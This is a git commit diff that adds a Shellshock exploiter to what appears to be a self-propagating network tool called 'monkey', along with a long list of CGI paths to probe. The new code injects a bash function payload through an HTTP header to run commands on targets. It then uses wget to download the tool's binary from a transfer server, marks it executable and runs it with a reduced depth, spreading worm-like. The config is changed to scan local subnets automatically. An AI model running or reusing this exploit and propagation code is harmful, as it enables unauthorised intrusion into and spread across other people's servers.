forked from p34709852/monkey
Issue 23 - Added shellshock exploit.
This commit is contained in:
parent
bdde8dfeed
commit
a322a619cb
|
@ -1,7 +1,7 @@
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
from network.range import FixedRange, RelativeRange, ClassCRange
|
from network.range import FixedRange, RelativeRange, ClassCRange
|
||||||
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter
|
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter
|
||||||
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger,HTTPFinger
|
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger,HTTPFinger
|
||||||
from abc import ABCMeta
|
from abc import ABCMeta
|
||||||
import uuid
|
import uuid
|
||||||
|
@ -134,7 +134,9 @@ class Configuration(object):
|
||||||
|
|
||||||
scanner_class = TcpScanner
|
scanner_class = TcpScanner
|
||||||
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
|
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
|
||||||
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter]
|
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
|
||||||
|
SSHExploiter, ShellShockExploiter #Linux
|
||||||
|
]
|
||||||
|
|
||||||
# how many victims to look for in a single scan iteration
|
# how many victims to look for in a single scan iteration
|
||||||
victims_max_find = 14
|
victims_max_find = 14
|
||||||
|
@ -165,11 +167,11 @@ class Configuration(object):
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
# Auto detect and scan local subnets
|
# Auto detect and scan local subnets
|
||||||
local_network_scan = False
|
local_network_scan = True
|
||||||
|
|
||||||
range_class = FixedRange
|
range_class = FixedRange
|
||||||
range_size = 1
|
range_size = 1
|
||||||
range_fixed = ["88.198.218.174","212.73.212.91" ]
|
range_fixed = ['']
|
||||||
|
|
||||||
# TCP Scanner
|
# TCP Scanner
|
||||||
HTTP_PORTS = [80, 8080, 443,
|
HTTP_PORTS = [80, 8080, 443,
|
||||||
|
|
|
@ -18,3 +18,4 @@ from wmiexec import WmiExploiter
|
||||||
from smbexec import SmbExploiter
|
from smbexec import SmbExploiter
|
||||||
from rdpgrinder import RdpExploiter
|
from rdpgrinder import RdpExploiter
|
||||||
from sshexec import SSHExploiter
|
from sshexec import SSHExploiter
|
||||||
|
from shellshock import ShellShockExploiter
|
|
@ -0,0 +1,208 @@
|
||||||
|
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
|
||||||
|
|
||||||
|
import logging
|
||||||
|
from random import choice
|
||||||
|
import string
|
||||||
|
from tools import build_monkey_commandline
|
||||||
|
from exploit import HostExploiter
|
||||||
|
from model.host import VictimHost
|
||||||
|
from shellshock_resources import CGI_FILES
|
||||||
|
from model import MONKEY_ARG
|
||||||
|
from exploit.tools import get_target_monkey, HTTPTools, report_failed_login
|
||||||
|
import grequests
|
||||||
|
import requests
|
||||||
|
|
||||||
|
__author__ = 'danielg'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
TIMEOUT = 2
|
||||||
|
DOWNLOAD_TIMEOUT = 60
|
||||||
|
TEST_COMMAND = '/bin/uname -a'
|
||||||
|
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
|
||||||
|
|
||||||
|
|
||||||
|
class ShellShockExploiter(HostExploiter):
|
||||||
|
_target_os_type = ['linux']
|
||||||
|
|
||||||
|
_attacks = {
|
||||||
|
"Content-type": "() { :;}; echo; "
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self._config = __import__('config').WormConfiguration
|
||||||
|
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
|
||||||
|
self.success_flag = ''.join(
|
||||||
|
choice(string.ascii_uppercase + string.digits
|
||||||
|
) for _ in range(20))
|
||||||
|
|
||||||
|
def exploit_host(self, host, depth=-1, src_path=None):
|
||||||
|
assert isinstance(host, VictimHost)
|
||||||
|
# start by picking ports
|
||||||
|
valid_ports = [(port, host.services['tcp-' + str(port)][1]) for port in self.HTTP if
|
||||||
|
'tcp-' + str(port) in host.services]
|
||||||
|
http_ports = [port[0] for port in valid_ports if not port[1]]
|
||||||
|
https_ports = [port[0] for port in valid_ports if port[1]]
|
||||||
|
|
||||||
|
LOG.info(
|
||||||
|
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
|
||||||
|
host, ",".join([str(port[0]) for port in valid_ports]))
|
||||||
|
)
|
||||||
|
|
||||||
|
attackable_urls = []
|
||||||
|
# now for each port we want to check the entire URL list
|
||||||
|
for port in http_ports:
|
||||||
|
urls = self.check_urls(host.ip_addr, port)
|
||||||
|
attackable_urls.extend(urls)
|
||||||
|
for port in https_ports:
|
||||||
|
urls = self.check_urls(host.ip_addr, port, is_https=True)
|
||||||
|
attackable_urls.extend(urls)
|
||||||
|
# now for each URl we want to try and see if it's attackable
|
||||||
|
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
|
||||||
|
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
||||||
|
|
||||||
|
# we want to report all vulnerable URLs even if we didn't succeed
|
||||||
|
# let's overload this
|
||||||
|
[self.report_vuln_shellshock(host, url) for url in exploitable_urls]
|
||||||
|
|
||||||
|
# now try URLs until we install something on victim
|
||||||
|
for _, url, header, exploit in exploitable_urls:
|
||||||
|
LOG.info("Trying to attack host %s with %s URL" % (host, url))
|
||||||
|
# same attack script as sshexec
|
||||||
|
# for any failure, quit and don't try other URLs
|
||||||
|
if not host.os.get('type'):
|
||||||
|
try:
|
||||||
|
uname_os_attack = exploit + '/bin/uname -o'
|
||||||
|
uname_os = self.attack_page(url, header, uname_os_attack)
|
||||||
|
if 'linux' in uname_os:
|
||||||
|
host.os['type'] = 'linux'
|
||||||
|
else:
|
||||||
|
LOG.info("SSH Skipping unknown os: %s", uname_os)
|
||||||
|
return False
|
||||||
|
except Exception, exc:
|
||||||
|
LOG.debug("Error running uname os commad on victim %r: (%s)", host, exc)
|
||||||
|
return False
|
||||||
|
if not host.os.get('machine'):
|
||||||
|
try:
|
||||||
|
uname_machine_attack = exploit + '/bin/uname -m'
|
||||||
|
uname_machine = self.attack_page(url, header, uname_machine_attack)
|
||||||
|
if '' != uname_machine:
|
||||||
|
host.os['machine'] = uname_machine.lower().strip()
|
||||||
|
except Exception, exc:
|
||||||
|
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||||
|
return False
|
||||||
|
|
||||||
|
src_path = src_path or get_target_monkey(host)
|
||||||
|
|
||||||
|
if not src_path:
|
||||||
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||||
|
return False
|
||||||
|
|
||||||
|
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
||||||
|
|
||||||
|
if not http_path:
|
||||||
|
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
||||||
|
return False
|
||||||
|
|
||||||
|
# copy the monkey
|
||||||
|
|
||||||
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
|
|
||||||
|
download_command = '/usr/bin/wget %s -O %s;' % (
|
||||||
|
http_path, dropper_target_path_linux)
|
||||||
|
|
||||||
|
download_and_run = exploit + download_command
|
||||||
|
resp = self.attack_page(url, header, download_and_run)
|
||||||
|
|
||||||
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
|
http_thread.stop()
|
||||||
|
|
||||||
|
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# turn the monkey into an executable
|
||||||
|
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
|
||||||
|
run_path = exploit + chmod
|
||||||
|
self.attack_page(url, header, run_path)
|
||||||
|
|
||||||
|
# run the monkey
|
||||||
|
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
|
||||||
|
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
|
||||||
|
run_path = exploit + cmdline
|
||||||
|
resp = self.attack_page(url, header, run_path)
|
||||||
|
|
||||||
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
self._config.dropper_target_path_linux, host, cmdline)
|
||||||
|
|
||||||
|
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)):
|
||||||
|
LOG.info("Failed running the monkey, log file does not exist")
|
||||||
|
continue
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def check_remote_file_exists(cls, url, header, exploit, file_path):
|
||||||
|
"""
|
||||||
|
Checks if a remote file exists and returns the content if so
|
||||||
|
file_path should be fully qualified
|
||||||
|
"""
|
||||||
|
cmdline = '/usr/bin/head -c 4 %s' % file_path
|
||||||
|
run_path = exploit + cmdline
|
||||||
|
resp = cls.attack_page(url, header, run_path)
|
||||||
|
if resp:
|
||||||
|
LOG.info("File %s exists on remote host" % file_path)
|
||||||
|
return resp
|
||||||
|
|
||||||
|
def attempt_exploit(self, url, attacks=_attacks):
|
||||||
|
# Flag used to identify whether the exploit has successfully caused the
|
||||||
|
# server to return a useful response
|
||||||
|
|
||||||
|
LOG.debug("Attack Flag is: %s" % self.success_flag)
|
||||||
|
|
||||||
|
LOG.debug("Trying exploit for %s" % url)
|
||||||
|
for header, exploit in attacks.iteritems():
|
||||||
|
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
|
||||||
|
result = self.attack_page(url, header, attack)
|
||||||
|
if self.success_flag in result:
|
||||||
|
LOG.info("URL %s looks vulnerable" % url)
|
||||||
|
return True, url, header, exploit
|
||||||
|
else:
|
||||||
|
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
||||||
|
return False,
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def attack_page(url, header, attack):
|
||||||
|
result = ""
|
||||||
|
try:
|
||||||
|
LOG.debug("Header is: %s" % header)
|
||||||
|
LOG.debug("Attack is: %s" % attack)
|
||||||
|
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)
|
||||||
|
result = r.content
|
||||||
|
return result
|
||||||
|
except requests.exceptions.RequestException as exc:
|
||||||
|
LOG.debug("Failed to run, exception %s" % exc)
|
||||||
|
return result
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
|
||||||
|
"""
|
||||||
|
Checks if which urls exist
|
||||||
|
:return: Sequence of URLs to try and attack
|
||||||
|
"""
|
||||||
|
attack_path = 'http://'
|
||||||
|
if is_https:
|
||||||
|
attack_path = 'https://'
|
||||||
|
attack_path = attack_path + str(host) + ":" + str(port)
|
||||||
|
attack_urls = [attack_path + url for url in url_list]
|
||||||
|
reqs = (grequests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls)
|
||||||
|
resps = grequests.map(reqs, size=15)
|
||||||
|
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
||||||
|
urls = [resp.url for resp in valid_resps]
|
||||||
|
return urls
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def report_vuln_shellshock(host,url):
|
||||||
|
from control import ControlClient
|
||||||
|
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
|
||||||
|
'exploiter': ShellShockExploiter.__name__,
|
||||||
|
'url': url})
|
|
@ -0,0 +1,406 @@
|
||||||
|
# resource for shellshock attack
|
||||||
|
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
||||||
|
|
||||||
|
CGI_FILES = (r'/',
|
||||||
|
r'/admin.cgi',
|
||||||
|
r'/administrator.cgi',
|
||||||
|
r'/agora.cgi',
|
||||||
|
r'/aktivate/cgi-bin/catgy.cgi',
|
||||||
|
r'/analyse.cgi',
|
||||||
|
r'/apps/web/vs_diag.cgi',
|
||||||
|
r'/axis-cgi/buffer/command.cgi',
|
||||||
|
r'/b2-include/b2edit.showposts.php',
|
||||||
|
r'/bandwidth/index.cgi',
|
||||||
|
r'/bigconf.cgi',
|
||||||
|
r'/cartcart.cgi',
|
||||||
|
r'/cart.cgi',
|
||||||
|
r'/ccbill/whereami.cgi',
|
||||||
|
r'/cgi-bin/14all-1.1.cgi',
|
||||||
|
r'/cgi-bin/14all.cgi',
|
||||||
|
r'/cgi-bin/a1disp3.cgi',
|
||||||
|
r'/cgi-bin/a1stats/a1disp3.cgi',
|
||||||
|
r'/cgi-bin/a1stats/a1disp4.cgi',
|
||||||
|
r'/cgi-bin/addbanner.cgi',
|
||||||
|
r'/cgi-bin/add_ftp.cgi',
|
||||||
|
r'/cgi-bin/adduser.cgi',
|
||||||
|
r'/cgi-bin/admin/admin.cgi',
|
||||||
|
r'/cgi-bin/admin.cgi',
|
||||||
|
r'/cgi-bin/admin/getparam.cgi',
|
||||||
|
r'/cgi-bin/adminhot.cgi',
|
||||||
|
r'/cgi-bin/admin.pl',
|
||||||
|
r'/cgi-bin/admin/setup.cgi',
|
||||||
|
r'/cgi-bin/adminwww.cgi',
|
||||||
|
r'/cgi-bin/af.cgi',
|
||||||
|
r'/cgi-bin/aglimpse.cgi',
|
||||||
|
r'/cgi-bin/alienform.cgi',
|
||||||
|
r'/cgi-bin/AnyBoard.cgi',
|
||||||
|
r'/cgi-bin/architext_query.cgi',
|
||||||
|
r'/cgi-bin/astrocam.cgi',
|
||||||
|
r'/cgi-bin/AT-admin.cgi',
|
||||||
|
r'/cgi-bin/AT-generate.cgi',
|
||||||
|
r'/cgi-bin/auction/auction.cgi',
|
||||||
|
r'/cgi-bin/auktion.cgi',
|
||||||
|
r'/cgi-bin/ax-admin.cgi',
|
||||||
|
r'/cgi-bin/ax.cgi',
|
||||||
|
r'/cgi-bin/axs.cgi',
|
||||||
|
r'/cgi-bin/badmin.cgi',
|
||||||
|
r'/cgi-bin/banner.cgi',
|
||||||
|
r'/cgi-bin/bannereditor.cgi',
|
||||||
|
r'/cgi-bin/bb-ack.sh',
|
||||||
|
r'/cgi-bin/bb-histlog.sh',
|
||||||
|
r'/cgi-bin/bb-hist.sh',
|
||||||
|
r'/cgi-bin/bb-hostsvc.sh',
|
||||||
|
r'/cgi-bin/bb-replog.sh',
|
||||||
|
r'/cgi-bin/bb-rep.sh',
|
||||||
|
r'/cgi-bin/bbs_forum.cgi',
|
||||||
|
r'/cgi-bin/bigconf.cgi',
|
||||||
|
r'/cgi-bin/bizdb1-search.cgi',
|
||||||
|
r'/cgi-bin/blog/mt-check.cgi',
|
||||||
|
r'/cgi-bin/blog/mt-load.cgi',
|
||||||
|
r'/cgi-bin/bnbform.cgi',
|
||||||
|
r'/cgi-bin/book.cgi',
|
||||||
|
r'/cgi-bin/boozt/admin/index.cgi',
|
||||||
|
r'/cgi-bin/bsguest.cgi',
|
||||||
|
r'/cgi-bin/bslist.cgi',
|
||||||
|
r'/cgi-bin/build.cgi',
|
||||||
|
r'/cgi-bin/bulk/bulk.cgi',
|
||||||
|
r'/cgi-bin/cached_feed.cgi',
|
||||||
|
r'/cgi-bin/cachemgr.cgi',
|
||||||
|
r'/cgi-bin/calendar/index.cgi',
|
||||||
|
r'/cgi-bin/cartmanager.cgi',
|
||||||
|
r'/cgi-bin/cbmc/forums.cgi',
|
||||||
|
r'/cgi-bin/ccvsblame.cgi',
|
||||||
|
r'/cgi-bin/c_download.cgi',
|
||||||
|
r'/cgi-bin/cgforum.cgi',
|
||||||
|
r'/cgi-bin/.cgi',
|
||||||
|
r'/cgi-bin/cgi_process',
|
||||||
|
r'/cgi-bin/classified.cgi',
|
||||||
|
r'/cgi-bin/classifieds.cgi',
|
||||||
|
r'/cgi-bin/classifieds/classifieds.cgi',
|
||||||
|
r'/cgi-bin/classifieds/index.cgi',
|
||||||
|
r'/cgi-bin/.cobalt/alert/service.cgi',
|
||||||
|
r'/cgi-bin/.cobalt/message/message.cgi',
|
||||||
|
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
|
||||||
|
r'/cgi-bin/commandit.cgi',
|
||||||
|
r'/cgi-bin/commerce.cgi',
|
||||||
|
r'/cgi-bin/common/listrec.pl',
|
||||||
|
r'/cgi-bin/compatible.cgi',
|
||||||
|
r'/cgi-bin/Count.cgi',
|
||||||
|
r'/cgi-bin/csChatRBox.cgi',
|
||||||
|
r'/cgi-bin/csGuestBook.cgi',
|
||||||
|
r'/cgi-bin/csLiveSupport.cgi',
|
||||||
|
r'/cgi-bin/CSMailto.cgi',
|
||||||
|
r'/cgi-bin/CSMailto/CSMailto.cgi',
|
||||||
|
r'/cgi-bin/csNews.cgi',
|
||||||
|
r'/cgi-bin/csNewsPro.cgi',
|
||||||
|
r'/cgi-bin/csPassword.cgi',
|
||||||
|
r'/cgi-bin/csPassword/csPassword.cgi',
|
||||||
|
r'/cgi-bin/csSearch.cgi',
|
||||||
|
r'/cgi-bin/csv_db.cgi',
|
||||||
|
r'/cgi-bin/cvsblame.cgi',
|
||||||
|
r'/cgi-bin/cvslog.cgi',
|
||||||
|
r'/cgi-bin/cvsquery.cgi',
|
||||||
|
r'/cgi-bin/cvsqueryform.cgi',
|
||||||
|
r'/cgi-bin/day5datacopier.cgi',
|
||||||
|
r'/cgi-bin/day5datanotifier.cgi',
|
||||||
|
r'/cgi-bin/db_manager.cgi',
|
||||||
|
r'/cgi-bin/dbman/db.cgi',
|
||||||
|
r'/cgi-bin/dcforum.cgi',
|
||||||
|
r'/cgi-bin/dcshop.cgi',
|
||||||
|
r'/cgi-bin/dfire.cgi',
|
||||||
|
r'/cgi-bin/diagnose.cgi',
|
||||||
|
r'/cgi-bin/dig.cgi',
|
||||||
|
r'/cgi-bin/directorypro.cgi',
|
||||||
|
r'/cgi-bin/download.cgi',
|
||||||
|
r'/cgi-bin/e87_Ba79yo87.cgi',
|
||||||
|
r'/cgi-bin/emu/html/emumail.cgi',
|
||||||
|
r'/cgi-bin/emumail.cgi',
|
||||||
|
r'/cgi-bin/emumail/emumail.cgi',
|
||||||
|
r'/cgi-bin/enter.cgi',
|
||||||
|
r'/cgi-bin/environ.cgi',
|
||||||
|
r'/cgi-bin/ezadmin.cgi',
|
||||||
|
r'/cgi-bin/ezboard.cgi',
|
||||||
|
r'/cgi-bin/ezman.cgi',
|
||||||
|
r'/cgi-bin/ezshopper2/loadpage.cgi',
|
||||||
|
r'/cgi-bin/ezshopper3/loadpage.cgi',
|
||||||
|
r'/cgi-bin/ezshopper/loadpage.cgi',
|
||||||
|
r'/cgi-bin/ezshopper/search.cgi',
|
||||||
|
r'/cgi-bin/faqmanager.cgi',
|
||||||
|
r'/cgi-bin/FileSeek2.cgi',
|
||||||
|
r'/cgi-bin/FileSeek.cgi',
|
||||||
|
r'/cgi-bin/finger.cgi',
|
||||||
|
r'/cgi-bin/flexform.cgi',
|
||||||
|
r'/cgi-bin/fom.cgi',
|
||||||
|
r'/cgi-bin/fom/fom.cgi',
|
||||||
|
r'/cgi-bin/FormHandler.cgi',
|
||||||
|
r'/cgi-bin/FormMail.cgi',
|
||||||
|
r'/cgi-bin/gbadmin.cgi',
|
||||||
|
r'/cgi-bin/gbook/gbook.cgi',
|
||||||
|
r'/cgi-bin/generate.cgi',
|
||||||
|
r'/cgi-bin/getdoc.cgi',
|
||||||
|
r'/cgi-bin/gH.cgi',
|
||||||
|
r'/cgi-bin/gm-authors.cgi',
|
||||||
|
r'/cgi-bin/gm.cgi',
|
||||||
|
r'/cgi-bin/gm-cplog.cgi',
|
||||||
|
r'/cgi-bin/guestbook.cgi',
|
||||||
|
r'/cgi-bin/handler',
|
||||||
|
r'/cgi-bin/handler.cgi',
|
||||||
|
r'/cgi-bin/handler/netsonar',
|
||||||
|
r'/cgi-bin/hitview.cgi',
|
||||||
|
r'/cgi-bin/hsx.cgi',
|
||||||
|
r'/cgi-bin/html2chtml.cgi',
|
||||||
|
r'/cgi-bin/html2wml.cgi',
|
||||||
|
r'/cgi-bin/htsearch.cgi',
|
||||||
|
r'/cgi-bin/hw.sh', # testing
|
||||||
|
r'/cgi-bin/icat',
|
||||||
|
r'/cgi-bin/if/admin/nph-build.cgi',
|
||||||
|
r'/cgi-bin/ikonboard/help.cgi',
|
||||||
|
r'/cgi-bin/ImageFolio/admin/admin.cgi',
|
||||||
|
r'/cgi-bin/imageFolio.cgi',
|
||||||
|
r'/cgi-bin/index.cgi',
|
||||||
|
r'/cgi-bin/infosrch.cgi',
|
||||||
|
r'/cgi-bin/jammail.pl',
|
||||||
|
r'/cgi-bin/journal.cgi',
|
||||||
|
r'/cgi-bin/lastlines.cgi',
|
||||||
|
r'/cgi-bin/loadpage.cgi',
|
||||||
|
r'/cgi-bin/login.cgi',
|
||||||
|
r'/cgi-bin/logit.cgi',
|
||||||
|
r'/cgi-bin/log-reader.cgi',
|
||||||
|
r'/cgi-bin/lookwho.cgi',
|
||||||
|
r'/cgi-bin/lwgate.cgi',
|
||||||
|
r'/cgi-bin/MachineInfo',
|
||||||
|
r'/cgi-bin/MachineInfo',
|
||||||
|
r'/cgi-bin/magiccard.cgi',
|
||||||
|
r'/cgi-bin/mail/emumail.cgi',
|
||||||
|
r'/cgi-bin/maillist.cgi',
|
||||||
|
r'/cgi-bin/mailnews.cgi',
|
||||||
|
r'/cgi-bin/mail/nph-mr.cgi',
|
||||||
|
r'/cgi-bin/main.cgi',
|
||||||
|
r'/cgi-bin/main_menu.pl',
|
||||||
|
r'/cgi-bin/man.sh',
|
||||||
|
r'/cgi-bin/mini_logger.cgi',
|
||||||
|
r'/cgi-bin/mmstdod.cgi',
|
||||||
|
r'/cgi-bin/moin.cgi',
|
||||||
|
r'/cgi-bin/mojo/mojo.cgi',
|
||||||
|
r'/cgi-bin/mrtg.cgi',
|
||||||
|
r'/cgi-bin/mt.cgi',
|
||||||
|
r'/cgi-bin/mt/mt.cgi',
|
||||||
|
r'/cgi-bin/mt/mt-check.cgi',
|
||||||
|
r'/cgi-bin/mt/mt-load.cgi',
|
||||||
|
r'/cgi-bin/mt-static/mt-check.cgi',
|
||||||
|
r'/cgi-bin/mt-static/mt-load.cgi',
|
||||||
|
r'/cgi-bin/musicqueue.cgi',
|
||||||
|
r'/cgi-bin/myguestbook.cgi',
|
||||||
|
r'/cgi-bin/.namazu.cgi',
|
||||||
|
r'/cgi-bin/nbmember.cgi',
|
||||||
|
r'/cgi-bin/netauth.cgi',
|
||||||
|
r'/cgi-bin/netpad.cgi',
|
||||||
|
r'/cgi-bin/newsdesk.cgi',
|
||||||
|
r'/cgi-bin/nlog-smb.cgi',
|
||||||
|
r'/cgi-bin/nph-emumail.cgi',
|
||||||
|
r'/cgi-bin/nph-exploitscanget.cgi',
|
||||||
|
r'/cgi-bin/nph-publish.cgi',
|
||||||
|
r'/cgi-bin/nph-test.cgi',
|
||||||
|
r'/cgi-bin/pagelog.cgi',
|
||||||
|
r'/cgi-bin/pbcgi.cgi',
|
||||||
|
r'/cgi-bin/perlshop.cgi',
|
||||||
|
r'/cgi-bin/pfdispaly.cgi',
|
||||||
|
r'/cgi-bin/pfdisplay.cgi',
|
||||||
|
r'/cgi-bin/phf.cgi',
|
||||||
|
r'/cgi-bin/photo/manage.cgi',
|
||||||
|
r'/cgi-bin/photo/protected/manage.cgi',
|
||||||
|
r'/cgi-bin/php-cgi',
|
||||||
|
r'/cgi-bin/php.cgi',
|
||||||
|
r'/cgi-bin/php.fcgi',
|
||||||
|
r'/cgi-bin/ping.sh',
|
||||||
|
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
|
||||||
|
r'/cgi-bin/pollssi.cgi',
|
||||||
|
r'/cgi-bin/postcards.cgi',
|
||||||
|
r'/cgi-bin/powerup/r.cgi',
|
||||||
|
r'/cgi-bin/printenv',
|
||||||
|
r'/cgi-bin/probecontrol.cgi',
|
||||||
|
r'/cgi-bin/profile.cgi',
|
||||||
|
r'/cgi-bin/publisher/search.cgi',
|
||||||
|
r'/cgi-bin/quickstore.cgi',
|
||||||
|
r'/cgi-bin/quizme.cgi',
|
||||||
|
r'/cgi-bin/ratlog.cgi',
|
||||||
|
r'/cgi-bin/r.cgi',
|
||||||
|
r'/cgi-bin/register.cgi',
|
||||||
|
r'/cgi-bin/replicator/webpage.cgi/',
|
||||||
|
r'/cgi-bin/responder.cgi',
|
||||||
|
r'/cgi-bin/robadmin.cgi',
|
||||||
|
r'/cgi-bin/robpoll.cgi',
|
||||||
|
r'/cgi-bin/rtpd.cgi',
|
||||||
|
r'/cgi-bin/sbcgi/sitebuilder.cgi',
|
||||||
|
r'/cgi-bin/scoadminreg.cgi',
|
||||||
|
r'/cgi-bin-sdb/printenv',
|
||||||
|
r'/cgi-bin/sdbsearch.cgi',
|
||||||
|
r'/cgi-bin/search',
|
||||||
|
r'/cgi-bin/search.cgi',
|
||||||
|
r'/cgi-bin/search/search.cgi',
|
||||||
|
r'/cgi-bin/sendform.cgi',
|
||||||
|
r'/cgi-bin/shop.cgi',
|
||||||
|
r'/cgi-bin/shopper.cgi',
|
||||||
|
r'/cgi-bin/shopplus.cgi',
|
||||||
|
r'/cgi-bin/showcheckins.cgi',
|
||||||
|
r'/cgi-bin/simplestguest.cgi',
|
||||||
|
r'/cgi-bin/simplestmail.cgi',
|
||||||
|
r'/cgi-bin/smartsearch.cgi',
|
||||||
|
r'/cgi-bin/smartsearch/smartsearch.cgi',
|
||||||
|
r'/cgi-bin/snorkerz.bat',
|
||||||
|
r'/cgi-bin/snorkerz.bat',
|
||||||
|
r'/cgi-bin/snorkerz.cmd',
|
||||||
|
r'/cgi-bin/snorkerz.cmd',
|
||||||
|
r'/cgi-bin/sojourn.cgi',
|
||||||
|
r'/cgi-bin/spin_client.cgi',
|
||||||
|
r'/cgi-bin/start.cgi',
|
||||||
|
r'/cgi-bin/status',
|
||||||
|
r'/cgi-bin/status_cgi',
|
||||||
|
r'/cgi-bin/store/agora.cgi',
|
||||||
|
r'/cgi-bin/store.cgi',
|
||||||
|
r'/cgi-bin/store/index.cgi',
|
||||||
|
r'/cgi-bin/survey.cgi',
|
||||||
|
r'/cgi-bin/sync.cgi',
|
||||||
|
r'/cgi-bin/talkback.cgi',
|
||||||
|
r'/cgi-bin/technote/main.cgi',
|
||||||
|
r'/cgi-bin/test2.pl',
|
||||||
|
r'/cgi-bin/test-cgi',
|
||||||
|
r'/cgi-bin/test.cgi',
|
||||||
|
r'/cgi-bin/testing_whatever',
|
||||||
|
r'/cgi-bin/test/test.cgi',
|
||||||
|
r'/cgi-bin/tidfinder.cgi',
|
||||||
|
r'/cgi-bin/tigvote.cgi',
|
||||||
|
r'/cgi-bin/title.cgi',
|
||||||
|
r'/cgi-bin/top.cgi',
|
||||||
|
r'/cgi-bin/traffic.cgi',
|
||||||
|
r'/cgi-bin/troops.cgi',
|
||||||
|
r'/cgi-bin/ttawebtop.cgi/',
|
||||||
|
r'/cgi-bin/ultraboard.cgi',
|
||||||
|
r'/cgi-bin/upload.cgi',
|
||||||
|
r'/cgi-bin/urlcount.cgi',
|
||||||
|
r'/cgi-bin/viewcvs.cgi',
|
||||||
|
r'/cgi-bin/view_help.cgi',
|
||||||
|
r'/cgi-bin/viralator.cgi',
|
||||||
|
r'/cgi-bin/virgil.cgi',
|
||||||
|
r'/cgi-bin/vote.cgi',
|
||||||
|
r'/cgi-bin/vpasswd.cgi',
|
||||||
|
r'/cgi-bin/way-board.cgi',
|
||||||
|
r'/cgi-bin/way-board/way-board.cgi',
|
||||||
|
r'/cgi-bin/webbbs.cgi',
|
||||||
|
r'/cgi-bin/webcart/webcart.cgi',
|
||||||
|
r'/cgi-bin/webdist.cgi',
|
||||||
|
r'/cgi-bin/webif.cgi',
|
||||||
|
r'/cgi-bin/webmail/html/emumail.cgi',
|
||||||
|
r'/cgi-bin/webmap.cgi',
|
||||||
|
r'/cgi-bin/webspirs.cgi',
|
||||||
|
r'/cgi-bin/Web_Store/web_store.cgi',
|
||||||
|
r'/cgi-bin/whois.cgi',
|
||||||
|
r'/cgi-bin/whois_raw.cgi',
|
||||||
|
r'/cgi-bin/whois/whois.cgi',
|
||||||
|
r'/cgi-bin/wrap',
|
||||||
|
r'/cgi-bin/wrap.cgi',
|
||||||
|
r'/cgi-bin/wwwboard.cgi.cgi',
|
||||||
|
r'/cgi-bin/YaBB/YaBB.cgi',
|
||||||
|
r'/cgi-bin/zml.cgi',
|
||||||
|
r'/cgi-mod/index.cgi',
|
||||||
|
r'/cgis/wwwboard/wwwboard.cgi',
|
||||||
|
r'/cgi-sys/addalink.cgi',
|
||||||
|
r'/cgi-sys/defaultwebpage.cgi',
|
||||||
|
r'/cgi-sys/domainredirect.cgi',
|
||||||
|
r'/cgi-sys/entropybanner.cgi',
|
||||||
|
r'/cgi-sys/entropysearch.cgi',
|
||||||
|
r'/cgi-sys/FormMail-clone.cgi',
|
||||||
|
r'/cgi-sys/helpdesk.cgi',
|
||||||
|
r'/cgi-sys/mchat.cgi',
|
||||||
|
r'/cgi-sys/randhtml.cgi',
|
||||||
|
r'/cgi-sys/realhelpdesk.cgi',
|
||||||
|
r'/cgi-sys/realsignup.cgi',
|
||||||
|
r'/cgi-sys/signup.cgi',
|
||||||
|
r'/connector.cgi',
|
||||||
|
r'/cp/rac/nsManager.cgi',
|
||||||
|
r'/create_release.sh',
|
||||||
|
r'/CSNews.cgi',
|
||||||
|
r'/csPassword.cgi',
|
||||||
|
r'/dcadmin.cgi',
|
||||||
|
r'/dcboard.cgi',
|
||||||
|
r'/dcforum.cgi',
|
